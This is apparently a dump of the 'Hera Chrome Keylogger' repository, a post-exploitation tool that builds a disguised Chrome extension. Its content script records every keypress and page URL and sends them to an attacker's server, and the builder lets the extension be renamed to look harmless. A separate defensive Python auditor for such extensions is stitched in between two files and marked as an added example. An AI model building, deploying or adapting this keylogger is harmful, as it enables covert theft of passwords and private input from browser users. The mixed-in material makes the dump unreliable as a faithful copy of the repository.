├── Images
│   ├── .gitkeep
│   ├── hera.png
│   ├── sc.png
│   └── video.png
├── LICENSE
├── README.md
├── Template
│   ├── icon128.png
│   ├── icon16.png
│   ├── icon48.png
│   ├── manifest.json
│   └── temis.js
├── core
│   ├── builder.py
│   ├── pre.py
│   └── view.py
├── hera.py
├── hermes.php
└── requirements.txt
/Images/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/.gitkeep
--------------------------------------------------------------------------------
/Images/hera.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/hera.png
--------------------------------------------------------------------------------
/Images/sc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/sc.png
--------------------------------------------------------------------------------
/Images/video.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/video.png
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2018, UndeadSec
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Hera Chrome Keylogger
6 |
7 | Post Exploitation Tool
8 |
9 |
10 | ### MAINTAINERS
11 | * **Alisson Moretto** |
12 | Twitter: @UndeadSec
13 | Github: @UndeadSec
14 |
15 | ### PREREQUISITES
16 |
17 | * Python 3.x
18 | * pip3
19 | * huepy from Python 3.x
20 | * PHP
21 | * sudo
22 |
23 | ### TESTED ON
24 | * **Kali Linux - Rolling Edition**
25 |
26 | * **Linux Mint - 18.3 Sylvia**
27 |
28 | * **Ubuntu - 16.04.3 LTS**
29 |
30 | * **MacOS High Sierra**
31 |
32 | ### CLONE
33 | ```
34 | git clone https://github.com/UndeadSec/HeraKeylogger.git
35 | ```
36 |
37 | ### RUNNING
38 |
39 | ```
40 | cd HeraKeylogger
41 | ```
42 |
43 | ```
44 | sudo apt-get install python3-pip -y
45 | ```
46 |
47 | ```
48 | sudo pip3 install -r requirements.txt
49 | ```
50 |
51 | ```
52 | python3 hera.py
53 | ```
54 |
58 | ## DISCLAIMER
59 |
60 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY
61 |
62 |
63 | The use of the HeraKeylogger is the COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
64 |
65 | "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
66 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
67 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
68 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
69 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
70 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
71 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
72 | Taken from [LICENSE](LICENSE).
73 |
--------------------------------------------------------------------------------
/Template/icon128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon128.png
--------------------------------------------------------------------------------
/Template/icon16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon16.png
--------------------------------------------------------------------------------
/Template/icon48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon48.png
--------------------------------------------------------------------------------
/Template/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Extension Name",
3 | "description": "Extension Description",
4 | "version": "1.0",
5 | "permissions": [
6 | "activeTab"
7 | ],
8 | "browser_action": {
9 | "default_title": "Extension Default Title"
10 | },
11 | "content_scripts": [
12 | {
13 | "matches": [""],
14 | "js": ["temis.js"]
15 | }
16 | ],
17 | "manifest_version": 2,
18 | "icons": { "16": "icon16.png",
19 | "48": "icon48.png",
20 | "128": "icon128.png" }
21 | }
22 |
23 |
--------------------------------------------------------------------------------
/Template/temis.js:
--------------------------------------------------------------------------------
1 | var keys = '';
2 | var current = document.URL;
3 |
4 | new Image().src = url + '/hermes.php?c=[' + current + ']';
5 |
6 | document.onkeypress = function(e) {
7 | var get = window.event ? event : e;
8 | var key = get.keyCode ? get.keyCode : get.charCode;
9 | key = String.fromCharCode(key);
10 | keys += key;
11 | }
12 |
13 | window.setInterval(function(){
14 | if( keys != "" )
15 | new Image().src = url + '/hermes.php?c=' + keys + ' ';
16 | keys = '';
17 | }, 1000);
18 |
19 |
--------------------------------------------------------------------------------
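A defender-side check for the pattern that manifest.json and temis.js show together, as an added example that is not part of the HeraKeylogger repository: it audits an unpacked extension directory for a content script that both registers a keystroke handler and contains an outbound network sink. The regexes, the broad-pattern list, the finding strings and the sample sources are assumptions constructed for this example.

```python
import json
import re
import tempfile
from pathlib import Path

# Broad match patterns, keystroke handlers and outbound sinks (lists assumed for this example).
BROAD = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
KEY_RE = re.compile(r"\.onkey(press|down|up)\s*=|addEventListener\(\s*['\"]key(press|down|up)")
SINK_RE = re.compile(r"new\s+Image\(\)\.src\s*=|\bfetch\(|XMLHttpRequest|sendBeacon\(")

def audit_extension(ext_dir):
    """Return sorted findings for one unpacked extension directory."""
    ext = Path(ext_dir)
    manifest = json.loads((ext / "manifest.json").read_text(encoding="utf-8"))
    findings = set()
    for cs in manifest.get("content_scripts", []):
        scope = "all sites" if BROAD & set(cs.get("matches", [])) else "limited sites"
        for name in cs.get("js", []):
            path = ext / name
            if not path.is_file():
                findings.add(f"{name}: listed in manifest but missing")
                continue
            src = path.read_text(encoding="utf-8", errors="replace")
            if KEY_RE.search(src) and SINK_RE.search(src):
                findings.add(f"{name}: key handler + network sink ({scope})")
            elif KEY_RE.search(src):
                findings.add(f"{name}: key handler, no network sink seen")
    return sorted(findings)

# Constructed samples (hypothetical names): match patterns and content-script source.
SAMPLES = {
    "suspect": (["<all_urls>"], "document.onkeypress = grab;\nnew Image().src = base + '/c?c=' + buf;\n"),
    "benign": (["https://example.com/*"], "document.addEventListener('keydown', openSearch);\n"),
}

def demo():
    """Write each constructed sample to a temp directory and audit it."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for label, (matches, source) in SAMPLES.items():
            ext = Path(tmp) / label
            ext.mkdir()
            manifest = {"manifest_version": 2, "content_scripts": [{"matches": matches, "js": ["cs.js"]}]}
            (ext / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
            (ext / "cs.js").write_text(source, encoding="utf-8")
            results[label] = audit_extension(ext)
    return results

if __name__ == "__main__":
    print(demo())
```

A key handler alone is common in legitimate extensions (shortcuts, search boxes), so only the combination with a network sink is reported as the stronger finding; treat the result as a triage signal for manual review, not a verdict.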
/core/builder.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/A1S0N_ #
10 | # #
11 | ######################################################
12 | from json import load, dump
13 | from os import system
14 |
15 | def build(prefix, domain):
16 | with open('MaliciousExtension/temis.js', 'r+') as f:
17 | content = f.read()
18 | f.seek(0, 0)
19 | f.write('var url = \'' + prefix + domain + '\';' + '\n' + content)
20 |
21 | def editMan(newName, newDesc, newVersion):
22 | with open('MaliciousExtension/manifest.json', 'r+') as f:
23 | data = load(f)
24 | data['name'] = newName
25 | data['description'] = newDesc
26 | data['version'] = newVersion
27 | f.seek(0)
28 | dump(data, f, indent=4)
29 | f.truncate()
30 |
31 | def runServer():
32 | system("sudo php -S 127.0.0.1:80")
33 |
34 |
--------------------------------------------------------------------------------
/core/pre.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/A1S0N_ #
10 | # #
11 | ######################################################
12 | from os import system
13 |
14 | def checkPHP():
15 | if 256 != system('which php'):
16 | return True
17 | else:
18 | return False
19 |
20 | def pre():
21 | system('rm -rf MaliciousExtension')
22 | system('mkdir MaliciousExtension')
23 | system('cp Template/* MaliciousExtension/')
24 |
25 |
26 |
--------------------------------------------------------------------------------
/core/view.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/UndeadSec #
10 | # #
11 | ######################################################
12 | from os import system
13 | from huepy import *
14 |
15 | def clear():
16 | system('clear')
17 |
18 | def phpNot():
19 | print(red("\n\n[!] PHP installation not found. Please install PHP and run me again. http://www.php.net/ "))
20 |
21 | def head():
22 | clear()
23 | print(cyan('''
24 | UNDEADSEC | t.me/UndeadSec | youtube.com/c/UndeadSec - BRAZIL
25 |
26 | ██ ██ ████
27 | ██ ██ ██ ██ ██████
28 | ██████ ████ ████ ██ ██ v1.0
29 | ██ ██ ██ ██ ██████
30 | ██ ██ ████ ██ ██ ██ Twitter: https://twitter.com/UndeadSec
31 | CHROME KEYLOGGER
32 | EXTENSION'''))
33 |
34 | def printQue(text):
35 | print(que(text))
36 |
37 | def done():
38 | print(good('Done. Load your extension in Chrome. (/MaliciousExtension/)'))
39 | print(good('Your logs will be saved as logs.txt'))
40 |
41 |
42 | def checkEd():
43 | print(red(" [!] Do you agree to use this tool for educational purposes only? (y/N) "), end = '')
44 | if input('> ').upper() != 'Y':
45 | clear()
46 | print(red('\n[ YOU ARE NOT AUTHORIZED TO USE THIS TOOL ]\n'))
47 | exit(0)
48 |
49 | def end():
50 | clear()
51 | print(cyan('''
52 | ,-`{-`/
53 | ,-~ , \ {-~~-,
54 | ,~ , ,`,-~~-,`, ██ ██ ████
55 | ,` , { { } } ██ ██ ██ ██ ██████ }/
56 | ; ,--/`\ \ / / ██████ ████ ████ ██ ██ }/ /,/
57 | ; ,-./ \ \ { { ( ██ ██ ██ ██ ██████ /,; ,/ ,/
58 | ; / ` } } `, `-`-.___ ██ ██ ████ ██ ██ ██ / `, ,/ `,/
59 | \| ,`,` `~.___,---} CHROME KEYLOGGER / ,`,,/ ,`,;
60 | ` { { EXTENSION __ / ,`/ ,`,;
61 | / \ \ _,`, `{ `,{ `,`;`
62 | { } } /~\ .-:::-. (--, ;\ `,} `,`;
63 | \\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
64 | `-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
65 | / , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
66 | /~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
67 | /`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
68 | /` .`\ /` . ^ , ~ , . ` . ~\~ ascii by xiong
69 |
70 | > Watch us on YouTube: https://youtube.com/c/UndeadSec
71 | > Follow me on Twitter: https://twitter.com/A1S0N_
72 | > Contribute on Github: https://github.com/UndeadSec/HeraKeylogger
73 | > Join our Telegram Group(Portuguese Brazil): https://t.me/UndeadSec \n'''))
74 |
--------------------------------------------------------------------------------
/hera.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | ######################################################
4 | # #
5 | # HeraChromeKeylogger #
6 | # #
7 | # by: UNDEADSEC #
8 | # #
9 | # Telegram Group: https://t.me/UndeadSec #
10 | # YouTube Channel: https://youtube.com/c/UndeadSec #
11 | # Twitter: https://twitter.com/UndeadSec #
12 | # #
13 | ######################################################
14 |
15 | from sys import exit, version_info
16 |
17 | if version_info<(3,0,0):
18 | print('[!] Please use Python 3. $ python3 hera.py')
19 | exit(0)
20 |
21 | from core.view import *
22 | from core.pre import *
23 | from core.builder import *
24 |
25 | if checkPHP() == False:
26 | phpNot()
27 | exit(0)
28 |
29 | def main():
30 | printQue('Insert your server ip/domain:')
31 | domain = input(' > ')
32 | if 'https://' in domain:
33 | domain = domain.split('https://')[1]
34 | prefix = 'https://'
35 | elif 'http://' in domain:
36 | domain = domain.split('http://')[1]
37 | prefix = 'http://'
38 | else:
39 | prefix = 'http://'
40 | build(prefix, domain)
41 | printQue('Edit manifest informations (i.e: name) [y/n] ?')
42 | editManifest = input(' > ')
43 | if editManifest.upper() == 'Y':
44 | printQue('Insert a new name:')
45 | newName = input(' > ')
46 | printQue('Insert a new description:')
47 | newDesc = input(' > ')
48 | printQue('Insert a new version number:')
49 | newVersion = input(' > ')
50 | editMan(newName, newDesc, newVersion)
51 | done()
52 | printQue('Start local php server [y/n] ?')
53 | server = input(' > ')
54 | if server.upper() == 'Y':
55 | runServer()
56 |
57 |
58 | if __name__ == "__main__":
59 | try:
60 | clear()
61 | checkEd()
62 | head()
63 | pre()
64 | main()
65 |
66 | except KeyboardInterrupt:
67 | end()
68 | exit(0)
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/hermes.php:
--------------------------------------------------------------------------------
1 |
10 |
11 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | # view.py: 13
2 | huepy == 0.9.8.1
3 |
--------------------------------------------------------------------------------